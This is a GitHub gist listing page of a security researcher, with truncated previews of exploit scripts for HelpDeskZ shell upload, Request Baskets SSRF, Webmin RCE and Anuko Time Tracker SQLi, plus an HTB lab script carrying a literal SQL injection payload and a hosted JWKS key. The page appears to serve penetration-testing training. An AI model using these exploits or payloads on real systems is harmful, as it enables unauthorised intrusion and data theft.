Rudra Sarkar rudSarkar

{
"message": "Bypassed the localhost to gist.github.com"
}
@rudSarkar
rudSarkar / jwk.json
Last active September 12, 2025 11:28
jwtks
{
"keys": [
{
"alg": "RS256",
"kty": "RSA",
"use": "sig",
"kid": "c352e221-4437-47e7-b5c0-7832acbaeb38",
"n": "voxh3CBHKablzbZLfJSXzZkSCWBTZMOz7mp3udKVevZGt-VUkNx4eEMHlKE1DzphqDNPWnPqHTKCTyVVCB69NIu5T3MdUIzXQ8oI8hoKrKsTcWkwggjTbRQYCeVMwEdO0KgCM61fcO6tdOh_kU4ToodM0_6ERGqag-0FPF8JXC7VZ9c9FaYo41lpLqnqrU2yxcGa2Bv7KfcTNaW92GxnGORisvcoxADKrdFRN6BKfgADZEH_sdNKfFHjdYizkGkx-8iKwpsoNZfaUrWycNmplEPof-9G7-d1G1dAU5QVgQ6I2mcV5jbWdU4B1PGh7aeipB1UbwIJR2scCiVhQZ8_Hw",
"e": "AQAB"
}
@rudSarkar
rudSarkar / helpdeskz_v1.0.2_exploit.py
Created August 29, 2025 16:59
HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
#!/usr/bin/python3
# reference: https://gist.github.com/SakiiR/b005c6d1c955502cfe1d1dfc959cc0f7
import sys
import requests
import hashlib
from time import time
def md5(data):
@rudSarkar
rudSarkar / request_baskets_v1.2.1_ssrf.py
Last active August 29, 2025 14:58
Request Baskets v1.2.1 SSRF Exploit
#!/usr/bin/python3
# https://nvd.nist.gov/vuln/detail/CVE-2023-27163
# https://github.com/darklynx/request-baskets
import argparse
import random
import string
import requests
@rudSarkar
rudSarkar / webmin_rce.py
Created August 13, 2025 06:48
CVE-2022-36446 - Webmin 1.996 Remote Code Execution
# Exploit Title: Webmin < 1.997 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446
import argparse
# Exploit Title: Anuko Time Tracker - SQLi (Authenticated)
# Date: 2022-05-03
# Exploit Author: Altelus
# Vendor Homepage: https://www.anuko.com/
# Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d
# Version: Anuko Time Tracker 1.20.0.5640
# Tested on: Linux
# CVE : CVE-2022-24707
# Reference: https://www.exploit-db.com/exploits/50915
@rudSarkar
rudSarkar / wsdl_sql_injection.py
Created August 10, 2025 19:35
Web Service & API Attacks - Skills Assessment
"""
Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
"""
import requests
url = "http://10.129.247.185:3002/wsdl"
username = "admin' or '1'='"
password = "password"
@rudSarkar
rudSarkar / docker-compose.yaml
Created July 31, 2025 04:44
Bloodhound docker
# Copyright 2023 Specter Ops, Inc.
#
# Licensed under the Apache License, Version 2.0
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
@rudSarkar
rudSarkar / main.go
Created April 20, 2025 15:41
Add the one missing number/word at the end of the md5; it's for the HTB Skills Assessment - Using Web Proxies
package main
import (
"encoding/base64"
"encoding/hex"
"fmt"
"strings"
)
func main() {
@rudSarkar
rudSarkar / install_python2.7.sh
Created April 16, 2025 09:17
Install python2.7 from source
#!/bin/bash
# Run this script with sudo
wget https://www.python.org/ftp/python/2.7/Python-2.7.tgz
tar xvzf Python-2.7.tgz
cd Python-2.7/
./configure